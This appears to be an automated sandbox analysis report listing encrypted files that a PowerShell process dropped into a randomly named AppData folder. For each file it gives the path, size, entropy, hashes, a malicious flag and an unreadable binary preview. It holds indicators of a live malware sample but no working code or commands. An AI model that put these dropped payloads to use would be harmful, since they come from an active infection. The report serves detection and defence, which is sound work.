C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ADPLMuNZCjmSWYXJeG.QLrRqYFtNd Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	59515
Entropy (8bit):	7.997130553175186
Encrypted:	true
SSDEEP:	1536:n806eNYFdv5TEzoiHFQOlxtMh+GezwJdx6ujX+0AmfCo:n806DtEz/lTMEC1Xxvfx
MD5:	5B24788A04AEF83BB810B69C884C4B81
SHA1:	FAE13E6CB040E29ECE49F5E336334586FB9F37E3
SHA-256:	8C223C6BA8727738D834234FEC51EEA5290E93FDA75DBCB03BB8B8D3D4E8C08B
SHA-512:	3FC05A449ED049FCDC32A900F0DEBE1C28A749FC81585C4EF94B5BEA7802F79E14C216DB25C77E750B3C55A6AC26231D4654841F572EEC6CDFD720679CA90E2E
Malicious:	true
Reputation:	unknown
Preview:	...e.2o..3.....F..._.=.......v.C..`~.Xd...G3.SyP...F).e.F3X.....j.p..[F.x.~.r...\......4...%.....:RR..m%r.....MR...B~.;O.<'. ...cl7.X..1\Li L.qQ.R.....[.o.mQ.#..k...%..!.....m\|f.SaV..7...V...<E..N[.o,.{z..............1\._3...'.!..&2.L.G.y.T..,..i..{.>..G!.\|...A.s..q....pQ.K.1.S.Y.2.V....,..6p.q....D..._6l..._s..;.....m.j..:....(....+O.sR.QB.>.....\|+.z..$V.V}.7..sz.%q.dG(...N....CYkF......Yq..t.....cQ...\;G...n..3=.ST..s.h;..6[..\|......I..j.aS..l.u1.H...A}x...\..(.?@...qF.l..@.Q.bl3.}.q......n.9.l.5...I._.,_7.....m.....8.....b.....~...Z.8.(.y..D(...jU.^.U..z...T.....s....N}....'..v.t(.cB....%r=U..Vd....E.......4S.!zaS.11 .mO)......nG......@...).....;..3.j.....).h....O.}c@..!.C.W;....F:.....`..4_......N.IJCnHd.:7.m..z.M6.........3.#.$...P7[..)-.?..;Dv.>./F.i..F.N.m~U.....3...T/......A...]2...[f....<a.y...Tms9.g;...+.K.y..6M.^tS......._.-..U.I....\.f..C..~...4*Ql....)....U.D..U......J_..... ..m....2.e9....,....a7e..onA........<;v.I..Mq8......

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\AhgdPpHiMqCJ.ficCsWRYUdbQAq Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198600
Entropy (8bit):	7.999060102601053
Encrypted:	true
SSDEEP:	3072:Ua2dEkGrbYDJG7wDgxTrSLetnjN39Y9hv/00vwnsOKUMUcbMQ4IxOd0U4ZJbsj6:Ua0Ely2w6TeCnx39YrUH+bSIxOoo6
MD5:	A96439350B798FDBCEC5D84012FF7F98
SHA1:	5B29D8EAC2360C761DF51E75A8683FC3736341B8
SHA-256:	0366AC00A60F58B569403D2D64082FF0DB6D7B7C7536152A1A7DE44ADE8A3F6A
SHA-512:	6CE3A50F40935B9094CA37480C68F0F0FD5A57BC00583542A4717558683B128AED6614B25F8895021609BA6F3FB94698E9EA7A8F29CD0E01488EF1D6E7565F4A
Malicious:	true
Reputation:	unknown
Preview:	..G....L./v$Yb.et.A.B.:..b\|..J...........a+\..m..\|.x.G..4xxL...Nu.D..F../..K`.....A....".V)V...@9.AG....U.S..i.8..zM.@.$.u.i.o..z,F...hG..\....e.'.&.`@...d...8...=.j....T..>..^...,..F.z..Q..$'N..#.....0..X.....y#j.Pcb)........I1....p@..).!TU......2X.Z..7..\.hm}...Z.).:o....\|(...d.J...i....h......OQ....QS.N;..F.[.}.%F.I.X.m.M..5.2.3Q\a-._...s..c^.Z...z.....J..m.y......\|..7.R.A.....L+...\|ZZ~......S2>.@.C.I.h..3..94.T.d.%.....O....Gz...Qm.O..CK..W....2..;.X....zz.q.}+U...KqHm.....)..l.z.~...6. ..$iH;.....S.....M..j..3....[8...Q~..EJZh..q...`]........?.9....Wt....(p.X....nL..i+.....r..n[.y..{..Y.....Xd...;E..H..]Vn..z...\FTk......hB..J..`..j.8".~@~.f.O.g.}B....?..V....AZR....I.Ey".T...G..}....+.T...r.?../.v&a..<Z....=o_....t.....}.n.gGI.....l.....s...rw..{8.&.[.\|).S.od8T....@:.M.R.:.S.o...s..!q..n.ha..T9..<;.H..^._.....T..m..8...N..v..d..*....s{...q_V../{..1K....z.`....A....C.4.a..U.F......^.C..72..L..._.#BF.I.h!.$..7...`..q..J..../..`....G.c..o....\|

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BCPwxrMdHT.AWakiLJdNlyVvxznMc Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61140
Entropy (8bit):	7.996678448741323
Encrypted:	true
SSDEEP:	1536:LR1up7dvF53DnpjRbqnQzJ3UH+1BQ2SbSX:Op7n9DpjRGn6EH+12D+X
MD5:	CAE3072DBD04CE1421A08ED4C169180D
SHA1:	EBF205CAF5C7BB4DBF4D7899DF7E4551383CEE88
SHA-256:	6B5D679ADBC91EAF9F0ADB38FFE7908CB37436013D8FB43BA564537143CE8C7A
SHA-512:	853F26E8508CDE70439A39EDEA547B46F35B811710FD6746BD4333F14B65B475A99859D467AFC9F9AC845B723122F982A3CEBD2514ED8AE42285A92DB5218221
Malicious:	true
Reputation:	unknown
Preview:	q...(...%,......?.n..O.e%.P_..^..n.3.XN..}\|..^.u,.a.-"<t.PMS.Q...2...X..u..?h yu...>.wLq.'..M.+...+<t...A..P.....v6.8.4.R..1..'q...N9h...J..t..1)..u..p....f#i,.l.t...t....U'..\|.P.#.ni.N..1...R.'....t..7..........R...P}....4....j..w]7.N..8........9L...6.Z...b......x[..!kqUA+5i..09kn?...'O....4x.."........./\&!.B.Y$...goM..Zm..w...1.....:..(~..T.S..;.;3a..Qs~{.}Y....?.!.w..%....1_Z..".Z(..A..I.$/.O..L.ue..<.v.ZM.......`....Y.z.b..%L....]...PuRo-\.V~..d.C.[.>..!...'.{,.....j.K,b....%........=k.G^......2...^.l../.kg6.......z......X`.f>.'....%.yV.'....P..o...ZD......P.sz.,.Qw.m..$.S.F..}..-g.Y..w6.L.W...}......5...h).R.E.;..Z%7.b.O.[x/..\$.L.$).....=}u.....G.kG\|.O............?.+..V."..$..w..=...t....G....VJ..@7.J}...u...=..C+........h.......c8\4...D.f......;.'.S;ss.8....[....iV..{....K...>..D........d...]...&h...@R..'.33.....A....\..uZ.Q........r.h....\|...U..........9..W.J<.......NbN...9...q...*...R_@.%9}T.X..W..bM..d.i..'a..)..'J.8...(x...?,.U

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BEKUtgixuFlSIDYqm.ZJcNmvtRqreC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	191565
Entropy (8bit):	7.998984316954593
Encrypted:	true
SSDEEP:	3072:9GhZ4W8sxSQf3UZnnacfGTsiaNH7ywCfN0ymwu0LO8VDa6xhCr0P0EvYPcj6t2xx:9SZ4W8cInacftp9UO8WghCrBj2klxPtq
MD5:	7F9EF98A8F7FA03C5C6FDC3179232957
SHA1:	5C5FB026A19AD9903076BDF42A36D0EF961CACB2
SHA-256:	8D393325220B44940BFD6F2648178EF41314A8F9C25202EDE4F34EADA2990DF1
SHA-512:	1E87AB58E1DA8E61088FC2B3640482A27FFEEAABA70C559D1A0EDF76CAE5084192DF7D2D6EC505B22EEC2BC44E05327595AB62D52BA3173C7FDD373F293EBD91
Malicious:	true
Reputation:	unknown
Preview:	...J\|....R,u..S~....C.. m6.5....&.a..k..q$..5.Y...'.FJ...Er...r.en........jX..`..U.f@...&.^d%.(..g+.W+.u.q..D.....8$.m=@.j.lcK0.9.t..:.j.....J{...9...X....]&tK.}>R....#6Y?....!..@...z.b.z.b..s..m..w.r.l.......uc4....x._....l....)YJN:..+....{!.T..u....n.T.3..a.2....c ..L...(E}.b9.r..W1....4.!....ooq.l.3.<.Y.OP..`{4......RB.<.(..xs..U.>uT.P_.fV.2.:`.@.i.!.}..f.....u..p.K...w...3.8..4..Z.q...y.j..i...{.-....y.......5D...[ry.A'..hW.../...p.Y...=4........).IQ..5.CC......Z..j..b..{D........@...^.s.7.w.!sg6...f3.UW.....\.;h ...Cvf..]............I.X.95.zR.R.<..........>X...F.[\.^....-.!Q..4.U...@...O..>.+.4.]........I.7....\|..2....MY...vi.;.=.[\\.....`....u...AsC....l.......YW..{..r....j.d.&@.....uL..^..GB....,..~j...$}'.+..M.I...`.l8z.L.......zL....Q...2...@.X~.._ZF.k[..w..t.{.5}....MG.,.>f+e.#...#....XD....'.j...z...y.6e.w........Rb.@P.A....Po.f8I.z+..FF.u"..t.X.&zY..8....'....i...D..Fs.f~...MI..K.eZ....1.].<H.9.T.>."...d.q...yF.=<.]...}.Ag#.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BNgfnqclVwHb.AqZNzUeMbsWFLnaX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106137
Entropy (8bit):	7.997839175589196
Encrypted:	true
SSDEEP:	3072:wbOVMsXOZKNSOSsNPGMfLYaBl/iPCLuEDSzEz6UM5Hf:wbOVMhv6dRvhaEksfMN
MD5:	3C5CDD70777B48602EDAA98653C361DE
SHA1:	CBDC50491C11E2A42821D84128B5D2E25331846C
SHA-256:	03C23A37FA389AEC1E0E9EBD785AF4F94B62E0D70DBA84144A9B93CF5F520D9D
SHA-512:	FC50525130686A235773FA92D456D9FA80C32569E2FFDC540627E5623000CF4E0CED1E1552A1E34D220CA21E3FB606124CE425FBAD39E12AC7413C4CAA684E5E
Malicious:	true
Reputation:	unknown
Preview:	...41..;,e...@..FE..F..o.R._......sq...`.;..u.).C5.y...\|..r\|1XU.:.=Dfy`..c.).`.._.}.iv..c..=....Y.j.4..J..S........V......NYC.d.M.+...\|.'...2V8..u.R._0=...?.....m7../yTx.^...\|.!21&.e.P.......X........4...<~] ..}u.....wu............O.C/.8.z..2..9...."..h...f8./..s.<X...z.......,.q.xj.7a.....,x.?N.W../....Qs?j.....e.s../...>.d..P...:......m7%...Bb.Y..]23........1.Y.........N+.D.....?..........[2..M.m.N#'7.?a.....6A>.....+B....qD..3..m...I._...j%.G.<.R....<Mh.s...L.%..C..@{D.K..*`.7Hu.#..SR...L..p.uM.v..m\|....`...z....H.-...U...-[=.....d..ic... ..F..-....#.....$"9....Q~[`A..p.\|.%...u.pF:8aL.?o..]..u....l.a.f.l..S.W...c~..1T .)r..E..........."...U.)I..L...........v.......2c.d.b.Z3r^........f..Ft..3.1..\.H.5..k.H..........@.aV..........d...B+..WK.9%3v.6,..tS\.i...9."ZE. ......a.4..]rk......-......(o.e.l.R...S'H.#/.J.O=)......Q.U..`..6G........Y.\|. .<..D.:..w....,.B.A.5.P...y1..xl4..\n........?q.e::^W....g...CX....qs@}.4<

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BmPyrAcdqptuwGUWVlo.YJEASlNgXGtkZDF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	121393
Entropy (8bit):	7.998566910130629
Encrypted:	true
SSDEEP:	3072:6uHPbFMxWCkKlnqGe0l4WJJVVFc+/3ZXhyGhvF:60b6+Klns0lrJJeMLp
MD5:	CE9540DE1B7F77F20B197771B9291A21
SHA1:	CAC56758BA77FBC4E9718E021C661B75D37D24B8
SHA-256:	05A150C1A6D3865F1803172F90DD80268C717BF7C202A0D3A48EF755C9F184A8
SHA-512:	C7A7A909D2E2F40ED9820C0310693369F86EF982E6775F0328A4574BD91B9D0AE570F731F436E5E10D91C2962330924F5EB891E18821BDE088231A8B9CB0228F
Malicious:	true
Reputation:	unknown
Preview:	..t....^.~.q.k....]4Q..W!z..{....=r..'].R.....n....'...#.4S-.r.w.WU...'..<....y....[NK....Z.......VQ&...\|..f.X...........Gqk....28#..~9@...S..a...Q..LB.0BQ.`...1&}...`t.6.s.....+..\|j....\|<.q.."`[...m.`d......4T......z$.+...".^=~.....2d.t...<.z.[..;.IO4...t.#\|'..k{.]-.a.k^B.lrI%.s...VO../..."..].t........,o+..>9..+..a.a...e.d...7..x^.{..........1..;.x].Fr...?^}0.3....O.....\|.k..o.9..o.p......y\|.=\d.Yy..2Et4......!-....<..U...p.U .!...<...M...r.../........ma.0l.r..7...T%....T..AI_.9`..(..xq...>......"....h.)>O....h..Lj1..o..^..\|g..r..S=.H........q..d.....Zc...(.U.........C.......e?.Vf.K.f.&E.?@c..y". .W....vP..K...D...!k.J~.kr....C(...N)n'.5`..F7,....Q......q..\.#."g:...0.26X/..4E.S.,.3..... ..'#...!...~....=;......zw.>S3..].8..cS...Jpm....kL...l4U{)l.w..!..l#..._.vp..n.v.s...8.y...<#...L.l[..pS...H.s.1...cmV....#.m..sI....B.U.....lG.........s.L..1....'u..x..=..D\|.h5...J.!t......>2Al..+?.A.../.p&...~.....^..\|(V...:p...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BmligDTVfWspEvFzRyn.AeTocESRpjXhvwL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	193148
Entropy (8bit):	7.999261809368124
Encrypted:	true
SSDEEP:	3072:a3o3Jxx1/mXDY8R7F9V6AiE+n64lzSv1f9W3JxnbnvLZZDvG9z/xcFnm2iTb0M:a3o3TxAXs8RHvjwtonkHF9vozqs5
MD5:	C1F67C44695A68DD0B1AE56CFBA35BBA
SHA1:	2382EC39626905376288F3A33A8D72D4B49806DD
SHA-256:	C1DE9AB716792558355B5427519C8B887E169E29C58612506293CBE41DCB1114
SHA-512:	8A94A492B5C0C650B9C8DAE5EBFA7E70323EBAEC866A5434C14DFD8D0ADED090BDA6FFEE31E35A74FF9451EC5CACA29829AA78763C388E9F52BA86C09AE5DED1
Malicious:	true
Reputation:	unknown
Preview:	@..t.v=5^.P,..F.".=......y$6..?g..G.;.}`..1.i.....m..r....Q.lH..W.....D..wS..]'.Ulj.U..,X..-.(.V..;..........mr=\....,.j.uN`.j..K.x.&[.......?...q....O..0m...@_......p.d.8.sLf..fp./....8..1....(.Z.2:.=..!.3.@.wBs.C.!.8.....h.>. .v.nw."#8........(...8....].;Tq.c.3X....!..E ...z..3N:...0...[7.6..J.-{`/O....nh....b`...h_.....<.0.0.[..........(1r.k.].C...WaI...=R....&W..$...W..x_...S....:5.X..^.,.D\|.....}..u?..j..J.Y....4.-......wRn.......^.d.^...9...=.>.b....@....}j:....#.......s0...@.I.J...!c.........bm...3f..`..~l}.h>.....c$.!.r..t.Z ..Ed.^m/u.K..#.B.d....Dt1.#z.$L.."..q.^..Z...V..1....Me.2,....\..%..M..B...op.:*Hu.....U?s....C1....1=0..90.Qx.;.3.}C..JP.....-..-cZ......%}"3.@n..L.=.......d.....N.1.^of....bG.lK...\|.v...8.w..zu#.W..D.....C.T.....B..V...6..C..$......[.h...=].5.2..6AD..Fz. .U..%.....\|...SS4X..w...._..ejO...7?s..f.....E~r...M.r..[=..kB..4...;#%..B....lI..X...q.D.lW..Qi..#Ie7.tXs.Sx.p..x...c]7....4G...eH...i@.^.q.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BokmnrsbFvKeE.VqlvzOiugmdSKDa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	165128
Entropy (8bit):	7.998867723978184
Encrypted:	true
SSDEEP:	3072:zNCyiXuiKNx60Cfq+bD8/LhiLA/wAf2+RzbqQXAOC6P2TA:zNoXuiKuTfI/t8AIKBR3LXC6d
MD5:	6DDA6A9E7CC9EA58676F17EDFB807888
SHA1:	591894B4EB687A708D43A99D50C6BAC0C7A92C99
SHA-256:	5470C16C9DAF290545AC9016A28C0D0BE72CF0404A7120409137BD2CA33834B5
SHA-512:	125F6DA341ACE2FDF573FCF3D1C9155F7062CE7F6C70E51DD2E314C5624EA6750B18A78C86DD77D9112E0E6E0BCEAD7CF10CD7E71AE2884E899266D9A630C552
Malicious:	true
Reputation:	unknown
Preview:	tC.y..vac......Ao.We...LhZ....~...&.H....{AT.........}..,x..UR.....s.....V{V1..;.]..k.%.\|i....(IQ...V....-..S_v...5..C......0.S../....#.d...(..KX...:.C..^..-.U.F.G,.(J..3..[.6z..`.&...>...J...^...v.#...9......NsX[....M.Y;o...[Q.e~..K... .....n2........FW...W.......;..6....}..J.......4..\|......z........&.:.(..(...L.00.w0...S..<.ft.........D<...&..$.TiYS.*sm....Kq..u.._...uLM...Y.P+.U~_...7..Cl.Sp.b%.~.F.`.R......q...dZg"(.O....=..4..I.....q..0.-.T...h\lPI.....uP..r`f.d.rx.".b...iZt).rs.$.5B.b.0R%.&.:.....%.%..$,..@.y..8l./s....-=../.}s..M..Y..tV...3....B.....D.A..Y.>_M.@mt.U[......a..0...6.....y.+aK..._\|....k....{...Sg..g_.xxF).+F8 ..-.BY..x.b1J....R.P.....u9...?l.q.y....{...\|-mGG..N.i......7k.[...H._......-..G.lU,g...Bpp...Cd.p..T%..%QP..y....S..d.........".....6.m.....}{x.wN.\|1.......-..t....".]...I>.r....5i@.o..t.M...Sv....T.>.'.:./.v..i....J"$'3f.i......+..+..c5......H..c.-r....y.&....9.<:..}\E..Z...q(.h...S.....9..=.i[n\|.8.,.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BoqCbDpQKO.bvFPZaXthUNlE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Macintosh MFS data (locked) created: Wed Jun 28 18:40:26 2084, last backup: Tue Jul 1 11:58:28 2014, block size: -508797179, number of blocks: 13847, volume name: \313\360\032\014w\224\3462\026\206au\304\374\344\027\206>&xMhoi\0208\254}\272\346o\350~\313JP\033
Category:	dropped
Size (bytes):	84481
Entropy (8bit):	7.998028865094415
Encrypted:	true
SSDEEP:	1536:3x5ZnAerIT7lfRYywOq9DV7gKMLxcdlD2+NoIyWerSRScfZHclAA+SneVnusaUwe:B5lA0InlfRYQqz7gK/dly+GIOa5A+aZ4
MD5:	88B959CE81709F81B1EEA599D95AE7F8
SHA1:	55FB7D10A3F6EEBFAF4756BC8EE6B91497479BD1
SHA-256:	A6548B636BA7E1444FE64D0918908552226E6BE358E5AF1795428FB0B793C451
SHA-512:	2974DBD0E6CC3CEF29F6E938A2CC68256E10F9058C76C835C8B597B9B27FC76B6412E023254F859125FB6C760E0ED6388B91F29CC9B2B5040584DBA35AA5FCAE
Malicious:	true
Reputation:	unknown
Preview:	..\`.v......."m.{.~=+.Os......yf$.Am.......?~ ...t........Q.$b.U..Ndu......Hm....;....E.R....X...P...P.5....._p..:.pa..5..O....at.@.h.C6m.D :i.y..N0c.opE8....:.\|_\|...S.d../.;.....D....#.)&b..5..S...T....@......&..(i.}.>eL...0.O... .?..(1uc..i.Ve.}....?G..<Y....X.c)Q.....i#..D.w.L..........Z..z}l-;J.......v.G...rj...i1X..3....I...-.4.\./.....&.cn......A{....K....c.5h..9...o..u#...R.;.....x.L..$e.8.".......MA(...\(1}...G!C...`..'.%...5...7..9...<...b...mrg...=...cG=.g.......#A/f#[..$`.&3..h..d9.3.s..b@.sct...>..hR.....y..8.].T..#..n.....NLX.yZ.C.T}O..k<.o......Q..Z(.3.6. .W.....i...x1VM/..t.e._.sH.,...........Q..9../...p........P.........5=L.#@..L.C..Ql....a..........oW.i.3.......Q.Q...~..=...!........I.9<.X..t.t.a0.6/P........7..\|< ....A..g2..VX)B].......'?.].....SB.Z..D.......#}wN.6....h.6.......9....k....\|.z...W.:.M"..\|D......:.>/.J.Sh...5./..]]`..m.6.o.v....~d.......d^....D...w4BU'....n.$..2v..QI.m..S...1Yk.sI!c...1w...9.-..m

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\BwtlDgayxqGrXA.yHZagIvPMxmTk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	87372
Entropy (8bit):	7.997459638257581
Encrypted:	true
SSDEEP:	1536:dxnIA9wQe/vn19dD9wUfgYZumUNtkEuQ7Ui4GY29woGDZqQCoLTTw9S2FCJKhO:/nIA9wl19dxwU4YZrUNtkEii0uwoCUox
MD5:	5E59F7ACA652CA5BD8AA2CD954EED4EE
SHA1:	CF1E8A8E5A8295EF2AB325CC14063B490818B776
SHA-256:	93F8D51F6B85EC23C4B9E6AEFDC0221831588CD9CFF825239F407FDAEBB403E4
SHA-512:	07EE6FC8B017C8699CA9CB508312C00CC05F84C661FD90F8F7EA6AE73BFDE411E013A997C7FF0B115CF5A794C6676DF4F414C87D606BDAB5B15B9BC73673E0DA
Malicious:	true
Reputation:	unknown
Preview:	.4i...M....;PE.\...8.VR.%d...@Am#.F".(h.A.k#...>.d..8.....^..}.k......p.s.../..y`.o.W^.h..e..{x....7?F...@!.....1...7,...w...\|ZDwu.B!Ni....t%V.$.Ii..G........oK..x...u..!y R..2..-S.x.........xg...H..,m....&..:..:...h..\..'h~.,.\.s.{mf.PS.....y-..Mi..hWoo>.V../...]...H.(7r..2.p._.....\|..?H;,..lo..pQb.m./7.9)v8n..E.G.`...tn.v.........ZS.~.d...^.]&.Uj.M.Z.P3.h....n,...Wa..+W.c...6qk@..TVAa....8i..^1.y;k.-!O....;1/...}.{..T.......Ble.6.M..2...R.....HS.X...C.a-`..n).t..Qp..u...(....-`......b..-....p.I..'......myBL......t.H.V.....:w..J9b...Y...YC........._>...2.e.9..~.....m.ur3F.`.B).NhP4...H..]..7.,\G..-c4...N.m"X6LlbJ.9.....h.C..L.ZC!..J..+..y;.....b...G.Mb.m.. ...+gF..J...D.........+.(f..3.AEX.../..e4.lv.q1....5.z.R?..v..j.....Q}G..v.bY....Si"...m..........YD.........7....".......v.w?%2....lr\..}...2....B.xu..,...Kx....`Wj. 0..f...c....*...?X\x..c...-...f.~..3.4...w.....V.v....`..$J..T.Q.@.....rL;v...A...=m.....k..#.......)l%M.~%..*

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CITDFuAyxedS.eEXnVCkTfxhNpYm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	60773
Entropy (8bit):	7.997303768412679
Encrypted:	true
SSDEEP:	1536:IdGmV4hDvA+Istf2jjXGRwLErMPrkbOeNk74E1bCnz64:rdE+IKIGRwOMg5Nk7n1bCnz64
MD5:	4FADE32D0C956993C5D578F06B5A3503
SHA1:	95F710FEE3412F23817F67C4CC056D674A23E733
SHA-256:	FA8761BC2378E543CF550B3ACDF7F381097E4FB0B2AF4BD6F20E483BD49994B7
SHA-512:	9B326C2B66442C3990A056D7BDF44E8324229F939C499407FF712B35610393ED44FA18E0D2E3E0F6930D4FCA08AEC5F7AC197FCB704E6C0CDF504E61BAD997FD
Malicious:	true
Reputation:	unknown
Preview:	?.....7..'5.j..S_.1......dz..]d.D.J/.K.......;......r.....w.@.\.>..SCo..b.....?....j~kh..jwjIl.D...nq.=.,..+...%84d.}{..d......... !..%..=.[=,..Q1.."......d..m.T+\|..h.?Y.=7c'..@.Rr...OS..;...B...M.....V.j...#wV.+...`... .... >..XX.y%......".5=!.H..&i....~I........"........k....E.b.}?..7.=..M.p.......f...@B.@.@..bkq.u7.s(.,....Z.b.....x....^.e+T.......h..k..G(JK-0.zo...r.....c..,lE.".;.."."\..B8.Q9.5.B......P.....u>W..j.4......a......Y(i@"...6<....=KC...t->..x...G.......Q....~t..6.$.R...o+.T3.....7..I..........&A..[....!.E-.b....=y...._.7..\| 7.h.R,.!g.([........*U1.z.1..=$.........^LC.>[..]......d.!......o..p.)..g6.....`..'.@1+...@...m.2."....7zY..Y.=.G...t}XD.It...C`.'\.n\ue2.........T1.,.z..n.cy....1.0...`.....y.p.)F..p....\.W.I....UH..i.l.{......P...w7.......h...n(.7..'\.....[...K..+.35...dN.):D.=u.......i.H..N.n....P.Y....l._.$.D....e.0. <....7K.......K......IO..)V......':.0.R".............l.W:..5p...}.voG.j&...G..U,..78?.-k.'...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CYcdsREkeDBiQztT.IqgsEQdBuXfoYWGhRt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	160802
Entropy (8bit):	7.998728233238785
Encrypted:	true
SSDEEP:	3072:VIAzI47w2c1XjzQPlU7ecHjgIx5RTlQqkwQ9vPWQDVDIBXwyXgg:VIdr2YjkPlysSLTlXS9HjSXwCl
MD5:	A827179A5844414D1179195489456109
SHA1:	7FFA06093DD10B8DA22C1910F26A195E8292EA69
SHA-256:	FA38AFAEA67A609821D8D390821EFC11BDC3BE1B46C73EEB6753E6E65320CB6B
SHA-512:	61395B0C7863C8A344AFC37D4D3081A495C2DED02DC6E11DFB7381A6C9A46DB851F6026E0056C954C815A12C17958C3E7788D45738BE1D1CF0C41834C0AAA738
Malicious:	true
Reputation:	unknown
Preview:	f..:.$..j..k..Hr..HV&....w_.,.Kk5..^.o...b...LbM....o@... ?...u.N6....1.wL..g..+...r...@..N....R.x..c(P.k#\|.)....Vo...qP..N..kS.{.Qp,W.!.......H.B.oN.Wj=F.m...K.-......e...xx.C(.tb...........+........lm....a....$..B....u....a...>....;.p'BD...E....f.h..s=.z.}.J..T....]Ivk..N.GFZ..i.Z...j.o...Z.m.%.......2F#.(....;A.f....;~V..2m`...Nj.8...B.o.&....+%.[..Y.6.J....f.r...ESm...0....Km.j.i.V\.P..,d.W..+SZ`.=.I..4..\|..ds.]9^..@t.g../g5...-. ,....7.....$......y..........17n.1e....=.7........0.c.P.=.y.$5......N...<..L...q..=..)......j.+ms.f...aN......y:.$X..m....M..u..E....QX........;W)FHw....%..H.WUY6D.w/..../.[..(..R./cG...D..\.Pe.....(.rGiyA.6\|i.kQW%...[...?.?t...g..t..."?..NV...@....h<._..:.\t.WR&.i.......o..z..UN...].&.r...Tx.y...!._4....R.B....8(...d.+.i."'d.4..~....z0N..n....@......4.9..r...j.8...QM.PE....4%.v.....LY...\.1.`N..n.Kz...w.x.pm..x..l-vAP..t\t..[....O.G.%JB.e.k.N.!i.\|.-F..[..c_..Q..=MX.k.,.o?...&Z..........a....p....l.vt./.f.S....4.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CaScxTGDgmFX.WYFiPJoxVmn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	101539
Entropy (8bit):	7.998046458670856
Encrypted:	true
SSDEEP:	3072:OvZHXhOKoyAoa4aRlcuLbtNck3UpIVLornkGV3g0:8FROyfCvXrcqyHnkGFn
MD5:	D5B13A2A9FE42F99411F54375249BC4F
SHA1:	D0855F4FC6E3066972B98D2FE46E38A554308820
SHA-256:	4B172286710A47237D8339CDFF5899790B5AF190B12634DB2274681F38BD304B
SHA-512:	E57E68AFF0F20C028D17AA3E8863C4A124EAD3C34109AA71A4BB2AEAEA96439E413D71498E0E1C8A8D3ADA3B628DE72120F59EB70B37D91869FB0C9C62DD35B5
Malicious:	true
Reputation:	unknown
Preview:	f..QxA.d.D.....z.Z.=..t+...v.8..n...D0..IBei:....XS.d.q..Ii.k...>..aD.h).I\....R4a..P...%...........&.6.)..e..@\|.P...O...;..mc...)I..J....&..f..~..}.u.p.7r...Z....].Bz..(.....+.;C.y....#X?m`......!.s...L....IG.......h..".\|.c....;...A...\|_K....L.}3..R..T..H.+...N..C...h\ .....{...Q....ra.k.Q........ZK.2.HD.4......d".d.t..Z.?..R.r..I.5.d.........A\.b.,3tOYco63yK...7./kL.f.(7`......,....S.`..r.d....,^...SK..T.e.,......S.Wmk......D.....S........E.....G.jZ....L.. .l..&<gaq.J..-q.`.....yY......0.t.....`(h/s..`#.A..e..yG.vrP.d..aP..6h...I...e.HGrm%...w.:<....Y.#.....[..A..s....D.R;.^..+...~...UEVAf..<.<...+L..K...../Y..*....[......gvz.T.q.......m.PW.#?....q...M...ma.......%..9..4...(e..^....X..W...d........X7.0..[..D.~e].hd.-X.F%.GM....i....W}..>r....(.>.c..^`t..!.W...!.gWG..b....V..NZ.k.{...E[....L.....x.\o{nZ.O.E&i.`1...d...Z0..b.s!8.M.........<b.Hq.....?..eYl8..H.....y.1...}... ..VN.J.Uf3/..3.hd..]..Pf}j..6........].J.c........;..x.#./`v..#v.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\CnjqfyQZLrAi.oPjxcwRQLGWazkiS Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	142046
Entropy (8bit):	7.998825207128537
Encrypted:	true
SSDEEP:	3072:X0aWEZG3oOQ5uvG56TfYRGpVC/zYPS8sBQCmS8T3RBf9vDCsQkf4HGn:XtbOQIMLuS8sBQY8bRBNlF
MD5:	065073C5F25967DC5A61868E3B397114
SHA1:	4F3B4E1B7140960F2B0FF5CDDCE81AD0BFA150E0
SHA-256:	62D75CFE6DA178C335473E5C648BB714F1FD69494ED03F26768B6726242D7962
SHA-512:	DBC2AA25D589D3FA547B52E4FCB8D15D4129C7FC84CDF436AE07ABD0050A0785A0CF874AEA7C43C58BEACBB5F321065A0192B7C1E8F768BB642E58BA3D18224F
Malicious:	true
Reputation:	unknown
